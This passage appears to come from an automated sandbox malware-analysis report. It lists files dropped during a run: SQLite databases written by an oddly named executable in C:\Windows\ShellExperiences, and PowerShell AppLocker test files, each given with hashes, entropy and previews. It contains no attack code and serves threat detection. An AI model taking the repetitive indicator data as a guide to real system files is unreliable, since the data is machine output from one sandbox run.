SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5707520969659783
Encrypted:false
SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:9F6D153D934BCC50E8BC57E7014B201A
SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:false
Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5707520969659783
Encrypted:false
SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:9F6D153D934BCC50E8BC57E7014B201A
SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:false
Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
